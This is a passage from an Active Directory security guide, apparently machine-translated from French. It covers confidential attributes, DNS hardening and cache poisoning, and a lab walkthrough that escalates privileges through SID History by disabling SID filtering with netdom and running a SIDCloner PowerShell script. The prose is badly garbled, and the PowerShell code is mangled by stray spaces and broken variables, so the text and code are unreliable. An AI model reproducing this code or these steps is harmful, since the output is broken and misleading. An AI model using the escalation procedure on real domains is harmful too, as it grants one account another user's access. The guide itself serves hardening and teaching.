previous domain controller to Windows 2008 R2, I invite you to use the PowerShell Module Dell ActiveRoles Management Shell 1.6 ( free)
production environment
downloadable beforeaddress:
at the following applyinghttp://software.dell.com/frfr/trials/#a
to production. . It will be necessary to deploy .Net Framework 3.5 on the
administrative machine.

You can also use HTA files. These files allow to have an interface in HTML that you pair with VBSCRIPT code. The website http://bbil.developpez.com/tutoriel/vbs/int
makes available databases to develop its HTA script.

Example of Self-Service interface (allowing users to update their information): http://community.spiceworks.com/scripts/show/626-active-directory-user-editor-h

Msreport - Guillaume MATHIEU - All rights reserved This procedure should be tested and validated a model of environmental copy of the
Example administration interface for Active Directory administrators:
http://community.spiceworks.com/scripts/show/573-aduc-update-utility

Msreport - Guillaume MATHIEU - All rights reserved


Example interface for the teams responsible for resetting the passwords:
http://www.bestintexas.com/Scripting/

These tools enable thus to delegate if necessary administration of directory data to non-IT staff. We will see later in this paper how to delegate
administrative rights to those users.

1.4.5 P Rotecting ATTRIBUTES THAT CONTAIN SENSITIVE DATA

By default the group Authenticated users has a read-only access to all attributes not a user account system. How to allow only certain users /
groups to read the value of an attribute containing confidential data?

Microsoft defines an attribute is confidential by adding the decimal value 128 to attribute
searchFlags at the object attribute in the Active Directory schema partition. Note that in the partition of Active Directory schema, Active Directory
attributes (such as the attribute GivenName which is the first name field) are objects that themselves have attributes. I invite you to read this
article in the Microsoft Knowledge Base that has this feature: http://support.microsoft.com/kb/922836/en-us

This action can not be performed on the basis of attributes (with the attribute systemsFlags at 0x10).
http://windowsitpro.com/active-directory/using-confidentiality-bit-hide-data-active-directory
We go Example below set attributes extensionAttribute1 and
EmployeeNumber confidential attributes.

Msreport - Guillaume MATHIEU - All rights reserved


searchFlags. With ADSIEDIT. MSC we enter the decimal value ( 128) and it is then displayed in hexadecimal in the GUI ADSIEDIT.MSC. If we try
with a basic attribute, then it fails (with the attribute systemsFlags at 0x10).

Launch console Active Directory Schema and set the attribute EmployeeNumber to be indexed (search optimization that rely on this attribute). It
can be seen as the attribute
SearchFlags updated while retaining personalization (Passage 0x80 to 0x81).

To launch the console Active Directory Schema, enter the command regsvr32 schmmgmt.dll, create a blank MMC and add the snap Active
Directory Schema.
The attribute extensionAttribute1 is displayed with its adminDisplayName. You therefore find MSEXCH-Extension-Attribute-1 in ADSIEDT.MSC
console. The attribute systemFlags ms-Exch-Extension-Attribute-1 (extensionAttribute1) has no value. This is not a core attribute. By
searchFlags against the attribute has the value 17 (decimal). For this attribute is always indexed and copied when a Helpdesk function uses the Copy
An Account

Msreport - Guillaume MATHIEU - All rights reserved Check that the attribute systemFlags is set to 0x0 and add value to the attribute 128
user, you must add the value 128 (decimal) to the existing value 17 (decimal) or 145 (decimal).

If given the value 1234 in the EmployeeNumber melanie.mathieu account, a standard user does not see this value, while a domain
administrator sees this value.

1.4.6 P O allow A USER OF VIEW THE VALUE OF A PROTECTED ATTRIBUTE

Now that the attribute ExtensioAttribute1 is configured as confidential attribute, we want the user account tigrou.mathieu ( standard user) can
read and domain administrators. Other accounts are not able to read the value of this attribute. You must use the LDP.EXE tool and connect to
the directory.

1. Go in the OR Techdays, right click and select Advanced | Security descriptor.

Click on Add ACE.


2. Type in the field tigrou.mathieu Trustee.
3. Check the boxes Access Control and Inherit.
4. Select extensionAttribute1 - attribute in the field Type Object.
5. Select wear in the field Inherited object type.
The tigrou.mathieu account must be member of the group GDL_ViewExtensionAttribute1.
Log in with the account tigrou.mathieu and check if it now has the opportunity to see at the extensionAttribute1 melanie.mathieu account
(located in the OR Techdays).

Note :
For attributes that store the Active Directory password is yet another type of protection.

Msreport - Guillaume MATHIEU - All rights reserved


1.5 STRENGTHENING SECURITY SERVICE DNS

1.5.1 Q HAT IS THE RELATIONSHIP BETWEEN A CTIVE D Irectory AND DNS?

The DNS protocol ( Domain Name Services) was created to help solve basic full names (DNS FQN) to IP (IP and FQDN and the FQDN in other
FQDN). It is easy indeed to store a name as an IP address.

Active Directory export the configuration directory as DNS entries. The workstations can thus locate domain controllers by performing DNS
queries.

Example with SRV2012C machine (192.168.1.112) and an Active Directory domain


msreport.be which has 2 Active Directory sites called Shirt and Meudon
When the machine srv2012c joined the Active Directory domain msreport.be, she does not yet know its Active Directory site. It will then connect
to a domain controller regardless of its network location by solving the DNS entry _ ldap._tcp.msreport.be. In our case our area has 2 domain
controllers srv2012a.msreport.be and

srv2012b.msreport.be. The DNS server has a feature called Round Robin ( in the properties of the DNS server) that allows him to select a DNS
entry randomly when multiple entries exist.

Once the machine srv2012c found a domain controller, it will look for its Active Directory site of attachment. For this, it will make its calculate
subnet address and send that information to the domain controller. The domain controller will determine the Active Directory site connecting the
workstation using the Active Directory site configuration (jersey in this example) and return the Active Directory site name to the machine. Srv2012c
will then resolve the DNS entry _ ldap._tcp.Maillot.msreport.be ( use of the feature round robin DNS) because it is the site Shirt which is attached
to the IP subnet 192.168.1.0/24. SRV2012C will store the name of the Active Directory site in the entrance DynamicSiteName the registry under HKEY_LOCAL_MAC
\ SYSTEM \ CurrentControlSet \ Services \ Netlogon \ Parameters.

For more information, see http://blogs.technet.com/b/arnaud_jumelet/archive/2010/07/11/domaincontroller-locator-in-depth.aspx .

Msreport - Guillaume MATHIEU - All rights reserved


Domain controllers use a CNAME entry in _msdcs.msreport.be to locate other domain controllers. Each of these entries is actually the GUID of
the domain controller.
The CNAME DNS entry permits the controller domain address
GUID._msdc.msreport.be in the domain controller FQDN. This FQDN is then solved by an IP address which allows the domain controller srv2012a.msreport.be
to replicate with domain controller srv2012b.msreport.be.

1.5.2 The A DNS UPDATE DYNAMIC

1.5.2.1 The principle of operation

These DNS entries are dynamically updated by the domain controllers using DNS dynamic update feature. The NETLOGON service on each
domain controller will record the file DNS entries c: \ windows \ system32 \ config \ netlogon.dns.

Each domain controller will also register its hostname in the DNS zone corresponds to its primary DNS suffix (the name of the default domain)
every 5 minutes. It is possible to manually force the registration by typing ipconfig / registerdns.

Practically all Windows machines will try to create / update a DNS entry that matches the name of the machine and the primary DNS suffix.

The primary DNS suffix of the machine defaults to the Active Directory domain DNS name.

Do not uncheck Change primary DNS suffix domain membership When exchange. This would result to generate very big problems. Indeed
when you type ping srv2012c, the system will actually make ping srv2012c.msreport.be ( He adds the primary DNS suffix).

Msreport - Guillaume MATHIEU - All rights reserved


Machines default register their name concatenated to their DNS suffix for the box Register the connection's address in DNS is checked by
default in the advanced TCP / IP NIC properties (DNS tab).

For information, Microsoft blocks dynamic DNS registration when the DNS suffix is ​the root zone or a top-level domain (eg. fr.). This prevents the
working group workstations trying to perform dynamic DNS update in this type of DNS zones.

Msreport - Guillaume MATHIEU - All rights reserved


1.5.2.2 Feedback on DNS dynamic update

A client had problems with the values ​of the type A DNS entries (FQDN resolved to an IP). Printers and workstations at the client were DHCP.
Each floor in the customer's premises had a VLAN (dedicated IP range).

Description of the problem :


Some DNS entries for printers and workstations were solved with the old IP address of the machine. This problem arose when:

• Case 1: Active Directory computer account for a Windows workstation was deleted and recreated.

• Case 2: it moved a printer / non-Windows machine between VLANs (same DHCP server)
• Case 3: if you moved a printer / non-Windows machine between two sites (change DHCP servers).

• Case 4: if an individual computer was manually created the DNS entry of a work / printer station.

• Case 5: If you had recently changed DHCP server (Windows 2003 migration to Windows 2012 R2).

The DNS zone was msreport.be directory-integrated and configured to allow secure dynamic DNS updates only ( Secure Only).

Where was the problem?


It simply is a permissions problem with DNS entries! When a DNS zone is integrated into Active Directory, DNS entries become objects (such
as user accounts) type DnsNode.

These objects have permissions. Now, to be able to update the IP address of a DNS entry type A (type Host, name resolved to an IP), you must
have the right To write the DNS entry (the dnsNode type object).

Who has the right to update a DNS entry?

Msreport - Guillaume MATHIEU - All rights reserved


When you manually create a DNS entry is the user account that created the entry that has the right to write.

For machines that retrieve an IP address via DHCP, it depends on the DHCP server configuration. Depending on the case, the DHCP server
computer account, the DHCP client computer account or a specific user account that has the right to change the DNS entry (which is configured
at the DHCP server).

How to determine who has the right to change a DNS entry?


Open the DNS console. Click on the menu View then select Advanced.
When you double click on a DNS entry, we now see the creation date of the recording (if a dynamically created DNS entry) and "Security" tab
(permission on the object).

How to set who can modify a DNS entry dynamically created?


To set this up, open the DHCP console and go in DHCP server properties. Go to the tab DNS.

1. If you select, Dynamically update DNS records of only requested by the DHCP clients Windows machines DHCP themselves create the DNS
entry. So this is the computer account of the Windows machine that has the right to change the DNS entry. For other machine (who can not
make available to secure DNS dynamic update), the computer DHCP server or a special user account account. In our example, the DHCP
server has been configured to enable DNS dynamic update using an account called Dhcp_update. This configuration is done in the DNS tab of
IPV4 and IPV6 properties DHCP server.

2. If you select Always update DNS records, it is the computer account of the DHCP server or a special user account that has the right to change
the DNS entries.

Employing a user account for dynamic DNS updates made by the DHCP server is configured in the tab Advanced in DHCP server properties.
Click on
Credentials. See Microsoft article http://support.microsoft.com/kb/282001/en-us

Msreport - Guillaume MATHIEU - All rights reserved


Setup Recommendation:
All DHCP servers must have the same configuration (DHCP Microsoft). Configure the DHCP server Dynamically update DNS records of only
requested by the DHCP clients.

Never delete computer accounts workstations (reset if needed). Configure the DHCP server to perform dynamic DNS updates using a service
account. See Microsoft article: http://support.microsoft.com/kb/282001/en-us . At the DNS server, give the level DNS zone msreport.be the right
of Read and Modify

all DNS entries in the special account ( DHCP_Update). Click on the tab Advanced. It is indeed necessary to set the permission so that it applies
on This all objects and objects descendants.

Msreport - Guillaume MATHIEU - All rights reserved


For DNS entries posing problems, it will be necessary to delete and recreate them with the command ipconfig / registerdns.

Additional information on services DHCP Client and DNS Client:


The service DHCP client should never be stopped even if the machine is IP FIXED! This service makes it possible to retrieve an address via a
DHCP server but it also allows to update the DNS entries dynamically. If you disable the service DHCP Client on a domain controller, the service NETLOGON
can not create / modify entries as SRV

_ldap._tcp.msreport.be. When the service DHCP Client is stopped, the message was Error: The system can not find the file specified when
making a ipconfig / registerdns. The service DNS Client only manages the DNS cache functionality. For more information :

http://support.microsoft.com/kb/264539/en-us
http://support.microsoft.com/kb/306602/en-us
http://support.microsoft.com/kb/318803/en- us

1.5.3 Q WHAT ARE THE POSSIBLE ATTACKS WITH DNS SERVICE

An attacker can disrupt the operation of the directory (replication) by altering the DNS entries that allow workstations to locate its domain
controller, enterprise servers and enabling each domain controller to replicate with other domain controllers.

Example of an attack based on DNS:


The company Msreport has an Apache web server called https://www.msreport.be. Users access a company's website with Internet Explorer by
authenticating with their login / password. As the website is configured to make HTTPS basic authentication, login / password does not flow in
the clear. Yes

the attacker able to change the DNS entry www.msreport.be in the DNS zone, it will eventually recover the login / user password. The only
limitation of this attack is that the certificate will not be valid. The user will be a warning message in Internet Explorer.

More sophisticated attacks allow an attacker to pollute the DNS cache of a DNS server or DNS client. Indeed, when a machine is a name
resolution, it puts the result in

Msreport - Guillaume MATHIEU - All rights reserved


the control
ipconfig / flushdns.
The DNS server has too, a cache where it stores DNS responses returned by other DNS servers (DNS entries on which it is not authoritative).

To delete the cache of a DNS server, open the DNS console, go to the DNS server properties and select Clear Cache.

If an attacker manages to insert a DNS entry in the DNS server's cache, it can redirect a user on a machine it manages.

1.5.4 S ECURISER YOUR DNS SERVERS

You should deploy the DNS service on all Active Directory domain controllers because as seen previously Active Directory relies on DNS to
allow customers to detect a domain controller. To secure a DNS server, the following actions must be performed:

• Integrate all DNS zones in Active Directory and configure DNS dynamic update on the parameter Secure Only.

• Do not allow zone transfers to any server and configure zone transfer with the IPSEC protocol.

• Protect the cache against pollution.


• Enable DNS SEC on all DNS zones.

1.5.4.1 Integrate DNS zones in Active Directory and enable secure dynamic update DNS

All DNS zones must be integrated into Active Directory. DNS zones will then be an object DnsZone and DNS entries become objects dnsNode that
replicate to all domain controllers. If you have multiple domains in the Active Directory forest, it is advisable to store DNS zones in ForestDnsZones
(Choose how you want data to be replicated area: To all DNS servers running on domain controllers in this Forest: msreport.be)

Msreport - Guillaume MATHIEU - All rights reserved cache. The cache can be displayed with the command ipconfig / displaydns and purge with
the forest that have the DNS service. In this configuration, all DNS servers will have access in read / write on the DNS zones.
It is recommended to only allow the secure dynamic update or disable the DNS dynamic update. This configuration can set permissions on the
zone and the DNS entries and ensures that an attacker can not modify DNS entries.

Msreport - Guillaume MATHIEU - All rights reserved zones hosted in the directory partition ForestDnsZones replicate to all domain controllers in
1.5.4.2 Securing the transfer of DNS zones

The zone transfer is the DNS native mechanism that enables server (s) DNS hosting the read-only zone (secondary zone) to replicate with the
server that hosts the read / write zone (main zone). It is recommended to protect replication traffic between servers by enabling IPSEC
(configuration in Windows Firewall level or via Group Policy). The transfer of a DNS zone should also be permitted from certain servers (those
that host a secondary zone). If you want to avoid DNS zones expire (this often generates production problems), be sure to configure the
notification. When a change is made in the DNS zone, the DNS server that has the read / write area then notifies the DNS servers that have the
read-only area of ​change.

The procedure for enabling IPSec between two DNS servers is explained in detail in this article:
http://technet.microsoft.com/fr-fr/library/ee649192(v=ws.10).aspx

1.5.4.3 Protect the DNS server cache against pollution

How can polluting the cache of a DNS server?


When a DNS server does not have the DNS zone corresponding to the DNS entry that has to solve, it uses a DNS forwarder. By default, the
Microsoft DNS server will query DNS root servers. It is possible to configure specific forwarders for specific DNS domain (conditional forwarder)
or a forwarder for all domains that DNS server does not support. In the example below, I have configured my DNS server on my servers to use
as my LiveBox redirect DNS server.

Msreport - Guillaume MATHIEU - All rights reserved


An attacker can get to insert incorrect information (eg www.microsoft.com FQDN is resolved to the IP 192.168.0.1 instead of the IP 2.19.95.132) in
the cache of a DNS server. This is called DNS cache pollution.

To perform this type of attack, the attacker will send requests to the DNS server for the IP address www.microsoft.com and will send the same
time answers to the DNS server with an incorrect IP www.microsoft.com ( 192.168.0.1).

The DNS server will do a DNS query to the DNS redirection to get the IP of www.microsoft.com.

The DNS server will take into account the different answers (good and bad) and will then select one and add it in its cache. With any luck, it will
select the wrong. If another user requests to resolve www.microsoft.com FQDN, the DNS server will check its cache and return the wrong
information to the other client.

Tools like ARPWNER or ettercap allow polluting the cache of a DNS server.
http://www.darknet.org.uk/2013/02/arpwner-arp-dns-poisoning-attack-tool/
http://www.thegeekstuff.com/2012/05/ettercap-tutorial/

How to protect the cache of a Windows DNS server?

1. The DNS response received by the server must have the same identifier of 16 bits that the DNS query generated by the DNS server. This
protection is native in the DNS protocol.

Msreport - Guillaume MATHIEU - All rights reserved


2. The target IP address and the DNS response target port must match the source port and source IP address of the DNS query the DNS server.
This setting corresponds with
SocketPoolSize which is enabled by default on all Windows DNS servers since the discovery of the MS08-037 vulnerability ( https://technet.microsoft.com/library/secu
). The command Dnscmd / info / SocketPoolSize Displays the number of different source ports that the DNS server can use: The command dnscmd
/ Config / SocketPoolSize 3000 This defines a pool of 3,000 ports various sources.

For more information on this setting:


http://technet.microsoft.com/fr-fr/library/ee649174(v=ws.10).aspx

3. The option Secure Cache contre pollution also limits the risk of DNS cache pollution and configured (by default) at the DNS server properties. I
invite you to read the article http://support.microsoft.com/kb/316786 for more information on this option.

4. Windows Server 2008 R2 DNS servers (and later) can block the change to DNS cache entry for a period of time corresponding to a
percentage of the life of the DNS entry (Time To Live or TTL ). In the example below the lifetime of the DNS entry CXCIRSEVEN-PC.msreport.be
is 20 minutes.

Msreport - Guillaume MATHIEU - All rights reserved


1.5.4.4 Enable DNS SEC on all DNS zones.

The main defect of the DNS is that it fails to authenticate the client and DNS server. DNS is therefore vulnerable to attacks such as DNS cache
pollution although the mechanisms provided in the previous sections are implemented. A new extension called DNS protocol DNSEC has been
implemented and allows truly secure DNS. It is available in DNS services to Windows 2008 R2 (and later).

DNSEC is activated at the DNS server and each DNS zone. Protected DNS zones appear with a padlock. Microsoft offers a guide to implement DNSEC:

http://technet.microsoft.com/fr-fr/library/hh831411.aspx

We get the following result.

Msreport - Guillaume MATHIEU - All rights reserved This setting corresponds Locking cover. A setup procedure is available at this address http://technet.microsoft.co
on DNSSEC:
http://technet.microsoft.com/fr-fr/library/ee649205%28v=ws.10%29.aspx
http://blogs.msmvps.com/vista/2012/11/22/windows-server-2012-signer-vos-zones-avec-dnssec/
http://technet.microsoft.com/fr-fr/library/ hh831411.aspx
http://www.labo-microsoft.org/articles/DNSSECPRES/2/Default.asp#_Toc277269110

1.6 ELEVATION OF PRIVILEGE WITH THE USE OF HISTORY SID

1.6.1 F AREA A PRIVILEGE TO INCREASE WITH SID H istory

In this example we have two forests:


• TPO.NET: Forest has a domain and configured in native fashion 2008 R2
• MSREPORT.BE: Forest has a domain and configured in native fashion 2008 R2

Our goal is to migrate the SID of the user TPO \ melanie.mathieu to the SID History attribute of the user msreport \ tigrou.mathieu. Tigger
MATHIEU and have all the user access Melanie MATHIEU (privilege escalation). The attribute SIDHistory is protected by the operating system.
A group member Domain Admins

has no right to add or delete a SID History (see error message below). The sIDHistory attribute is a table that can hold
several SID.

Msreport - Guillaume MATHIEU - All rights reserved For more information


To add a SID in the SID attribute History, we'll use the script SIDCloner available at: https://code.msdn.microsoft.com/windowsdesktop/SIDCloner-add-sIDHistory831a

1.6.1.1 Configuring the DNS name resolution

Create a first STUB area to area msreport.be. Embed this area at the
ForestDNSZones ( replicates to all domain controllers in the forest TPO.NET). Create a second-stub for the area _ msdcs.msreport.be ( same
configuration as for the area
msreport.be). A stepper is available at this address http://support.microsoft.com/kb/308201 . Check that all DNS servers in the domain TPO.NET
(DCs) can now resolve DNS entries in the DNS zone msreport.be and _ msdcs.msreport.be. You can do this using the NSLOOKUP tool.

Configure the DNS service for the domain controllers msreport.be resolve DNS entries tpo.net

The principle is the same as the previous step. You must create two STUB areas tpo.net and
_msdcs.tpo.net that you include in the directory at the partition level ForestDnsZones.

Msreport - Guillaume MATHIEU - All rights reserved


1.6.1.2 Creating cross-forest trust relationship

In this example, we will create a cross-forest trust relationship without selective authentication. Login to the PDC Emulator domain msreport.be and
launch the console Active Directory Domain and Trust.

Right-click on the domain name (msreport.be) in this example and click New Trust.
Enter the domain name to endorse (tpo.net). Choosing a Forest
Trust.
Then select Two-Way for the trust relationship is created on the 2 areas.

It must be authenticated in the trusted domain.


In our case, we will not enable selective authentication. We must therefore select Forest-wide authentication.

The forest users tpo.net So will members of the group Authenticated users in the forest
msreport.be and vice versa.

Msreport - Guillaume MATHIEU - All rights reserved


Active Directory detects UPN suffixes of the trusted domain. The UPN suffixes are alternative domain names. It is thus possible to have a UserPrincipalName
( login) that corresponds to their email address. Users can then open their session with their email address as a login and password.

Then confirm the trust relationship (inbound and outbound).

1.6.1.3 Disable SID filtering and enable the SID History

It is now necessary to disable SID filtering and activate the SID History at the trust relationship. Microsoft has developed SID filtering (enabled by
default) to fight against the privileges of elevations with the SID History (what one is doing).

When SID filtering is enabled, the SID contained in the SID History attribute are ignored. Disabling SID filtering History therefore lowers
significantly the security level of your Active Directory. This option is, however, necessary in the context of the merger of two Active Directory
domains with tools like Microsoft ADMT or Dell Migration Manager for Active Directory.

Example: You want to migrate domain resources tpo.net ( user accounts, computer accounts, groups, workstations, and domain member
servers) in the field
msreport.be.

To disable SID filtering History and enable the SID History:


Type the following commands on the PDC Emulator domain controller in the domain tpo.net:
netdom trust msreport.be /domain:tpo.net / quarantine: no / usero: administrator / passwordo: XXXXX netdom trust msreport.be
/domain:tpo.net / EnableSidHistory: Yes / usero: administrator / passwordo: XXXXX

Type the following commands on the PDC Emulator domain controller in the domain msreport.be:

Msreport - Guillaume MATHIEU - All rights reserved


netdom trust tpo.net /domain:msreport.be / quarantine: no / usero: administrator / passwordo: XXXXX netdom trust tpo.net
/domain:msreport.be / EnableSidHistory: Yes / usero: administrator / passwordo: XXXXX

Note that if you have domain controllers installed in French, there is a translation error in the order. You must type the command:

netdom trust msreport.be /domain:tpo.net / Quarantine: No / usero: administrator / passwordo: XXXXX netdom trust msreport.be
/domain:tpo.net / EnableSidHistory Yes / usero: administrator / passwordo: XXXXX

1.6.1.4 Configuring domain controllers

As controllers of tpo.net areas and msreport.be are Windows 2008 R2 and Windows 2012 R2, it is not necessary to create the registry entry TcpipClientSupport
as stated in the documentation of ADMT.

"If you are migrating from a domain with domain controllers That Run Windows Server 2003 or later to Reviews another domain with domain
controllers That Run Windows Server 2003 or later, the TcpipClientSupport registry entry does not-have to be modified. "

The domain local group TPO $$$ was created in the container Users Domain tpo.net. configure Default Domain Controller Policy in the fields msreport.be
and tpo.net with the following auditing settings as required in the documentation of ADMT.

• Audit account management: check the boxes Success and Failure.


• Audit directory service access: Success check the box.
On Windows 2012 domain controllers must also do in local GPO server (Gpedit.msc). Otherwise PowerShell script SIDCLONER fails with error

The operation requires That destination domain auditing be enabled. ADMT detects the problem and offers to fix it when migrating a user.

1.6.1.5 Register Service-admt in the field tpo.net

Create Account Service-admt in the source domain (tpo.net). This user must be a member of the group Domain Admins in the source domain and
must be configured so that the password never expires. At the target area (msreport.be), add the user tpo \ petrol admt in the group msreport \
Administrators.

Msreport - Guillaume MATHIEU - All rights reserved


1.6.1.6 Use SIDCLONER to add SID History

Copy the SID TPO \ melanie.mathieu to the user msreport \ tigrou.mathieu.


Log in with the account service-admt@tpo.net (tpo service \-admt) on the domain controller with the role PDC Emulator domain msreport.be.

Download and install Visual C ++ Redistributable for Visual Studio 2012 Update 4:
https://www.microsoft.com/en-us/download/details.aspx?id=30679
Create the C: \ _ adm.
Copy SIDCloner.dll file (SIDCloner_binaries.zip) from the website below and put it in the folder C: \ _ adm. Take the X64 release.

https://code.msdn.microsoft.com/windowsdesktop/SIDCloner-add-sIDHistory-831ae24b
Create the file c: \ _ adm \ identities.csv and edit it with Notepad. This file must be separated by commas and have the following format:

sourceDomain, sourceSAMAccountName, targetSAMAccountName tpo.net, melanie.mathieu,


tigrou.mathieu
Create the empty file c: \ _ adm \ CloneFailed.csv Click the button Unblock in properties of SIDCloner.dll
file.

The website https://code.msdn.microsoft.com/windowsdesktop/SIDCloner-add-sIDHistory-831ae24b


offers a sample script. The code has been simplified.
Create the file C: \ _ adm \ script.ps1 and edit it with Notepad. Type this code:

param (
[Parameter (Mandatory = $ false)] [String] $
inFile
)
$ ErrorPreference = 'Continue'
# constant
$ TargetDomain = "msreport.be"
[System.Reflection.Assembly] :: LoadFile ( "c: \ _ adm \ SIDCloner.dll") | Out-Null
# process parameters
# customize file / folder names
if ([String] :: IsNullOrEmpty ($ inFile)) {$ inFile = "c: \ _ adm \ identities.csv"}
# clear the log file
if ([System.IO.File] :: Exists ( "c: \ _ adm \ CloneFailed.csv")) {
Remove-Item -path. "\ Log \ CloneFailed.csv"}

$ Data = import-csv $ inFile


# # authenticate using credentials implicit $ i = -1

foreach ($ record in $ data) {


try {
$ I ++
# uses credentials of logged-on user (or credentials Stored in Credentials Manager); PDC works contre in Both domains

[Wintools.sidcloner] :: CloneSid (
$ Record.sourceSAMAccountName, $
record.sourceDomain, $
record.targetSAMAccountName, $ targetDomain

)
Write-Host "Account $ ($ record.sourceDomain) \ $ ($ record.sourceSAMAccountName) cloned"}

catch {
Write-Warning -message: "Account
$ ($ Record.sourceDomain) \ $ ($ record.sourceSAMAccountName) failed to clone`n`tError: $ (. $ ($
_ Exception) .Message) "
"$ ($ Record.sourceSAMAccountName) $ ($ record.sourceDomain) $ ($ record.targetSAMAccountName)"
> > "C: \ _ adm \ CloneFailed.csv"}

Msreport - Guillaume MATHIEU - All rights reserved


}

You should get the following result:

Start PowerShell as an administrator and run the script c: \ _ adm \ script.ps1.


The account should now have tigrou.mathieu SID History as the SID of the user tpo \ melanie.mathieu.

Msreport - Guillaume MATHIEU - All rights reserved


1.6.2 P O DELETE THE SID H istory

Download AdFind and AdMod tools and install them in the folder c: \ _ adm ADMT on the server.

http://www.joeware.net/freetools/tools/adfind/
http://www.joeware.net/freetools/tools/admod/

Run the following command to delete the SID History for user tigrou.mathieu.
C: \ _ adm \ adfind.exe -b " CN = Tirgrou Mathieu, OU = Techdays, DC = msreport, DC = be "sIDHistory -adcsv | c: \ _ adm \ AdMod.exe -sc
csh -unsafe

Msreport - Guillaume MATHIEU - All rights reserved


2 GOOD PRACTICES TO DELEGATE ITS ADMINISTRATION
DIRECTORY

2.1 BASIC PRINCIPLES OF DELEGATION OF DIRECTORS

2.1.1 ES DIFFERENT TYPES OF DIRECTORS A CTIVE D irectory

There are two major families of Active Directory administrators:

Administrators of Active Directory:


These people are in charge of running the Active Directory and its evolution. They take care of the administration of domain controllers,
supervision of the directory (validation operation, controllers), the backup directory and functional changes in this directory projects (migration
controllers domain to Windows 2012 R2).

They do not support the contents of the directory (no management of user accounts, groups, computer accounts, group policy objects ...). Only
administrators of Active Directory must have significant privileges on the directory. An Active Directory administrator usually has a registered
account administration groups as member

Domain Admins and a standard user account (for Internet access and enterprise applications).

The directors of the contents of Active Directory:


C eople are in charge of data administration of Active Directory (user accounts, groups, computer accounts, group policy objects). They must
have the most limited possible rights on Active Directory. An administrator of the contents of the Active Directory usually has a registered
administrative account with restricted privileges on some OR and a standard user account (for Internet access and enterprise applications).

2.1.2 ES GROUP WITH PRIVILEGES OF ADMINISTRATION

By default, when a domain is created, users and administrative groups presented in the following table are created.

Windows Server Windows Server 2008 (and later)


Windows 2000 <SP4 Windows 2000 SP4 -
Windows Server 2003 2003 SP1 +
Account Operators Account Operators Account Operators
Administrators
Administrators Administrators Administrators
Backup Operators
Backup Operators Backup Operators
Domain Admins Cert Publishers
Domain Admins Domain Admins Domain Admins
Domain Controllers Domain Controllers Domain Controllers
Enterprise Admins Enterprise Admins Enterprise Admins
Enterprise Admins Print Operators
Print Operators Print Operators Read-only Domain
Controllers

Schema Admins Schema Admins Schema Admins Schema Admins

These groups have very important permissions on the directory. Only accounts of the Active Directory service administrators must be members
of these groups. It is also important to note that applications like Exchange, Lync SCCM and create their own security groups that also have
very important rights on the directory. Members of these groups are therefore also to supervise.

The following script to list the direct and indirect members of the main Active Directory administrative groups.

# For non-US domain controller, please change the content of $ GroupsToManage


# Import Active Directory Module

Msreport - Guillaume MATHIEU - All rights reserved


Import-Module ActiveDirectory
# Variables $
Users = @ ()
$ Resultfile = "c: \ scripts \ admins_accounts.txt"
# List of groups managed by the solution
$ Groups = @ ( "Account Operators", "Administrators", "Backup Operators", "Domain Admins", "Domain Controllers", "Enterprise Admins",
"Print Operators", "Read-only Domain Controllers", "Schema Admins ")
# List members of al users $ Groups foreach ($
Group in $ Groups) {

Users + = $ (Get-ADGroupMember Group -Identity $ -Recursive)}

Users = Users $ $ | Sort-Object -Unique | Select-Object SamAccountName, ObjectClass, Sid


# Generate results files $ Resu =
@ {}
echo $ Resu | Out-File $ resultfile Foreach ($
user in $ Users) {

foreach ($ groups Group in $) {

if (Get-ADPrincipalGroupMembership $ ($ user.SamAccountName) | Where {$ _ eq $ Name Group.}) {

$ Resu [$ Group] = $ True} else {

$ Resu [$ Group] = $ False}}

$ Resu [ "user"] = $ ($ User.SamAccountName) echo $ Resu |


Out-File $ -Append resultfile}

2.1.3 D ELEGUER The ADMINISTRATION STANDARD USER

The goal is not to add this standard user into groups with significant administrative privileges. The objects in Active Directory have permissions.
You can view these permissions in the tab Security an object. You must configure the console Active Directory Users and Computers display
mode Advanced features for that.

Msreport - Guillaume MATHIEU - All rights reserved


To view the permissions on an object, go to the properties of this object, and then on the tab
Security. Click on the button Advanced. Each Active Directory object has permissions. You can delegate for each object class (users, groups,
organizational units, group policy objects, DNS entry, DNS zone ...) the right to Read or To write on each attribute of this class of objects. This
delegation of administration can be performed at the area of ​an organization or directly on an object unit (user account, group ...).

Msreport - Guillaume MATHIEU - All rights reserved


It is for example possible with Active Directory to delegate to the HR team the right to update only the attributes EmployeeID, employeeType at a
specific OR.
Let us now take a slightly more complex case:
You want to delegate to the directors of the contents of the directory the right to create, edit, delete and manage all properties (all attributes)
user accounts in an OU called Techdays. To do this, you must:

• Create a group called GG_Helpdesk_Techdays.


• Delegate the right to create, delete child objects for the class organizationalUnit ( object
OU).
• Delegate the right Total control for the class user ( objects user account).

In the example above This objects and all descendant objects corresponds to the organizational unit (OU) T echdays and all this in OR OR.

User objects descending corresponds to all user accounts in the OR Techdays.


We see in the following that the group catches GG_Helpdesk_Techdays only has the right to create and delete user accounts in the OU
Techdays (and all its sub OU).

We see in the following that the group catches GG_Helpdesk_Techdays also all rights to the attributes of the class User.

Msreport - Guillaume MATHIEU - All rights reserved


monitoring delegation. The screenshots below show the procedure to apply.

Msreport - Guillaume MATHIEU - All Rights Reserved Microsoft provides the wizard Delegation of Control to simplify the implementation of the
Msreport - Guillaume MATHIEU - All rights reserved
Msreport - Guillaume MATHIEU - All rights reserved
2.1.3.1 The WellKnown Security Principals

There are many groups / special accounts called WellKnown Security Principals or in French Entities known safety. These entities have a
standard and specific SIDs.
http://support.microsoft.com/kb/243330/en-us
http://technet.microsoft.com/en-us/library/cc779144(v=ws.10).aspx
The predefined group Authenticated users has the SID S-1-5-11. The membership to this group are managed by the system and can not be
changed manually. This group contains all users and computers that have logged at all areas of an Active Directory forest and have logged in
with a user account based SAM (local database) with the exception of account Guest (Guest).

It is possible to assign NTFS permissions to this group or to add it to a group of the local SAM database from one machine. It is not possible to
add Authenticated users as a member of a Local, global group or

universal created by an administrator.


Authenticated Users has a great many privileges on Windows workstations. By default, it opens on locally to all domain member machines and
trusted domains because it is a member of Users SAM base. Out of this group Users has the right to log on to the domain member machines.

By default Authenticated Users also has very important rights on the file system of a Windows 7 machine.

If you create a new folder C: \ Msreport, Authenticated users have the right Modify on this issue:
http://searchwindowsserver.techtarget.com/news/1195097/Foreign-security-principals-and-the-ActiveDirecory-architecture

The group Authenticated Users is located in the container Wellknow Security Principal the configuration partition (which is replicated to all
domains in the forest). This group is common to all domains in the same forest.

Msreport - Guillaume MATHIEU - All rights reserved


This is among other things due to the group Authenticated Users Microsoft now defines the forest as the only safe limit .

Trust relationships with selective authentication possible not to expand the group members Authenticated users users to a trusted domain. For
